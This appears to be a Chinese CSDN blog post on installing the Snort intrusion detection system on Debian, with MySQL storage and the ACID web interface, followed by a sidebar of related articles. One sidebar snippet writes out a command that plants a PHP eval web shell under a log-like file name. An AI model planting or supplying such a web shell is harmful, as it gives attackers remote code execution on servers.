Debian上安装轻量级入侵监测系统

最新推荐文章于 2023-03-23 22:11:30 发布
最新推荐文章于 2023-03-23 22:11:30 发布
阅读量1.4k 收藏
点赞数
文章标签: debian phpmyadmin mysql apache 数据库 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/acool555/article/details/324116
版权
首次尝试在debian上安装,过程非常简单。
为了便于分析结果,还安装了ACID。以下简要说一下过程。

首先安装apache+php4+mysql,
apt-get install apache2 libapache2-mod-php4 php4 php4-mysql mysql-server mysql-client
建立mysql存储snort输出的数据库snortdb;
建立管理该数据库的帐号snort@localhost,除了GRANT权限都给。
不熟悉mysql命令的可以用phpmyadmin(这个玩意以前bug比较多)
基于web的可视化mysql管理工具

安装snort-mysql,会自动安装snort-common,snort-rules-default
#apt-get install snort-mysql
安装完以后回答配置脚本的几个问题,然后记得把snortdb里的tables建立起来
zcat /usr/share/doc/snort-mysql/contrib/create_mysql.gz | mysql -u [id] -p -h [host] [snort-database]
如果跟我上面说的一样,[id]=snort [host]=localhost [snort-database]=snortdb
你或许希望手动修改/etc/snort/snort.conf /etc/snort/rules/* 来迎合自己的系统情况。

安装acidlab
#apt-get install acidlab
也要回答几个问题,snort-achieve-db也用snotdb这个库

好了,大功告成,在浏览器里看看 http://[yourhost]/acidlab/ 往下不用我多说了。
Debian真是好,省得自己一点一点改脚本让这几个东西配合。

最后提醒注意两点
1 建立.htpasswd保护 http://[yourhost]/acidlab/目录
2 记得经常更新你的snort-rules
acool555
关注
史上最全wireshark使用教程,8万字整理总结,建议先收藏再耐心研读
孙叫兽的博客
07-14 3万+
目录 第1章介绍... 1 1.1.什么是Wireshark. 1 1.1.1.主要应用... 1 1.1.2.特性... 1 1.1.3.捕捉多种网络接口... 2 1.1.4.支持多种其它程序捕捉的文件... 2 1.1.5.支持多格式输出... 2 1.1.6.对多种协议解码提供支持... 2 1.1.7.开源软件... 2 1.1.8.Wireshark不能做的事... 2 1.2.系通需求... 2 1.2.1.一般说明... 2 ...
【Linux 从基础到进阶】Linux系统安全扫描与漏洞修复
最新发布
weixin_39372311的博客
10-10 1227
随着企业信息化和云计算的发展,Linux系统被广泛应用于各种服务器和云平台中。然而,Linux系统作为一款开源操作系统,其安全问题也逐渐受到关注。面对日益严峻的网络攻击和漏洞威胁,管理员需要定期对系统进行安全扫描和漏洞修复,确保系统的稳定和安全。本文将详细介绍如何对 Linux 系统进行安全扫描,识别潜在的安全漏洞,并提供系统修复的最佳实践。
Debian安装轻量级入侵监测系统
03-22 141
Debian安装轻量级入侵监测系统[@more@]在Debian安装轻量级入侵监测系统 首先安装apache+php4+mysql,网上有大量的相关文档,不再浪费资源论述。 建立mysql存储snort输出的...
Linux 入侵检测分析技术
黑马程序员官方博客
04-26 1912
1. 概述最好的安全防护当然是“御敌于国门之外”, 通过安全防护技术,来保证当前主机不被非授权人员入侵,但是“道高一尺,魔高一丈”, 再好的防护手段、往往也会有疏漏的地方。在这种情况下,事后(入侵后)的追溯技术就很重要了。好比一个窃贼到我们家溜达一圈,我竟然无法知道是否窃贼来过,细思这是一件非常恐怖的事情。这就意味着,我们的家(主机)不在安全,鬼知道窃贼什么时候再来溜达一圈。入侵分析技术一般通过是...
如何在 Debian 11 上使用 Nginx 安装 HTTP Git 服务器
网络技术联盟站
12-17 2903
Git 是一个开源版本控制系统,被全球成千上万的开发人员使用,它用于在源代码级别跟踪您的软件更改,它允许您跟踪更改,将其恢复到之前的阶段并创建文件和目录的备用版本。 HTTP Git Server 是一个开源项目,它使用 Nginx 网络服务器通过局域网 (LAN) 为 Git 存储库提供服务,它非常简单且易于设置,任何人都可以从命令行界面管理它。 在本教程中,我将解释如何在 Debian 11 上使用 Nginx 设置 HTTP Git 存储库服务器。 先决条件 运行 Debian 11 的服务器。 指
Debian或Ubuntu下squid的安装与基本配置(已验证) - [服务器区]
土哥的BLOG
03-30 3770
转贴自欺欺人:http://linux.blogbus.com/logs/35912092.html2009-03-01版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明http://linux.blogbus.com/logs/35912092.html在debian lenny 5.0安装squid过程,记下来备查。安装使用 用户名和密码
Debian安装snort(续
weixin_53562571的博客
03-23 174
apt与apt-get:最常用的 Linux 包管理命令都被分散在了 apt-get、apt-cache 和 apt-config 这三条命令当中,apt = apt-get、apt-cache 和 apt-config 中最常用命令选项的集合。继续./configure daq动态库找不到 提示可以去XX网站找 我们在提示的snort下载daq-207.tar.gz(wget+压缩包链接 链接可以网页中右键获得) ls 然后tar zxvf解压 这样可以下载到指定的路径下。
Linux Mint Debian版安全加固指南:最佳实践与高级安全工具
# 1. Linux Mint Debian版概述与安全基础 Linux Mint Debian版(LMDE)是基于Debian稳定版的Linux发行版,提供了一个快速、舒适的用户体验...- **系统稳定性**:直接来源于Debian稳定分支,确保了系统的长期稳定性。 -
企业部署T-Pot(20.06)蜜罐系统并使用
考拉研究僧的博客
11-06 5096
Debian10搭建T-Pot蜜罐系统(脚本) 一、安装Debian10 虚拟机 1. 版本说明 目前最新版t-pot项目基于Debian10构建,本文采用Debian 10 作为实验环境 2. 下载 清华大学下载源:https://mirrors.tuna.tsinghua.edu.cn/# 3. 安装 环境说明 虚拟机软件:VMware Workstation Pro 15.5 镜像:debian-live-10.6.0-amd64-standard.iso 虚拟机安装(略) 配置要求:参考T-
系统管理优化:Kali Linux的高级故障排除技术
Kali Linux是一套广泛使用的渗透测试和安全审计Linux发行版,基于Debian,专门用于数字取证和安全领域。它自带了大量安全和渗透测试工具,适用于安全专家、道德黑客、渗透测试员和IT安全从业者。 ## 1.2 Kali Linux...
安装htpasswd命令
阿白,
09-23 1561
Ubuntu 系统安装htpasswd
liangkaiping0525的博客
12-17 3397
htpasswd是Apache附带的程序, htpasswd生成包含用户名和密码的文本文件, 每行内容格式为“用户名:密码”, 用于用户文件的基本身份认证。 当用户浏览某些网页的时候, 浏览器会提示输入用户名和密码, 比如awstats的日志报表, 你肯定不希望别人也能访问, 因此就需要对这些报表网页的访问增加身份验证。 如果你的web服务器是apache的话, 那么应该会自带h...
Ubuntu16系统安装htpasswd
weixin_30466421的博客
12-17 476
htpasswd是Apache附带的程序, htpasswd生成包含用户名和密码的文本文件, 每行内容格式为“用户名:密码”, 用于用户文件的基本身份认证。 当用户浏览某些网页的时候, 浏览器会提示输入用户名和密码, 比如awstats的日志报表, 你肯定不希望别人也能访问, 因此就需要对这些报表网页的访问增加身份验证。 如果你的web服务器是apache的话, 那么应...
htpasswd
weixin_33736832的博客
08-07 290
htpasswd命令网络服务器htpasswd命令是Apache的Web服务器内置工具,用于创建和更新储存用户名、域和用户基本认证的密码文件。语法htpasswd(选项)(参数)选项-c:创建一个加密文件; -n:不更新加密文件,只将加密后的用户名密码显示在屏幕上; -m:默认采用MD5算法对密码进行加密; -d:采用CRYPT算法对密码进行加密; -p:不对密码进行进行加密...
linux系统安装htpasswd
qq_40021015的博客
11-12 4868
htpasswd是Apache附带的程序, htpasswd生成包含用户名和密码的文本文件, 每行内容格式为“用户名:密码”, 用于用户文件的基本身份认证。 当用户浏览某些网页的时候, 浏览器会提示输入用户名和密码, 比如awstats的日志报表, 你肯定不希望别人也能访问, 因此就需要对这些报表网页的访问增加身份验证。 如果你的web服务器是apache的话, 那么应该会自带htpasswd程序的, 不过我用的是nginx作反向代理, 所以就需要安装一下了 输入htpasswd, 系统会提示在哪个包中可以
debian 网络代理_Debian系统代理服务器安装及配置
weixin_33396922的博客
02-01 3137
文章标题:debian下squid代理服务器的安装和简单配置Novell迷网站內容,版权所有一、资源的准备:本文引用自http://novell.me1. Linux系统采用的是Debain:Debian光盘的下载见 http://www.debian.org/http://Novell.Me2. 代理服务器软件采用Squid http://www.squid-cache.org/ 内容来自h...
[转]DEBIAN安装svn
weixin_33805557的博客
05-24 104
1.安装 debian:/# aptitude install subversion subversion-tools apache2 libapache2-svn 2.创建一个新的subversion储存库: debian:/# svnadmin create /lxq 在/lxq目录创建一个新的空储存库,数据储存方式默认采用Berkeley DB。 3.更改该目录的拥有者为网页读取 ...
黑客常用 Linux 入侵常用命令
热门推荐
杨春建的博客
02-10 1万+
原文地址:http://blog.csdn.net/jHstGeWWubw/article/details/78941387写个php一句话后门上去:[jobcruit@wa64-054 rankup_log]$ echo -e "<?php @eval(\$_POST[md5])?>" >rankuplog_time.php[jobcruit@wa64-054 rankup_l...
debian8.4下安装Snort处理tcpdump文件技术细节
isinstance的博客
05-14 3383
debian安装配置snort
Debian上Freeradius与Daloradius的详尽安装教程
Debian系统安装和配置FreeRADIUS及DALORADIUS是一项常见的任务,特别是在网络管理中实现身份验证、计费和访问控制。以下是详细的安装步骤和配置指南: 首先,确保你的Debian系统是最新的,因为更新的软件包可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值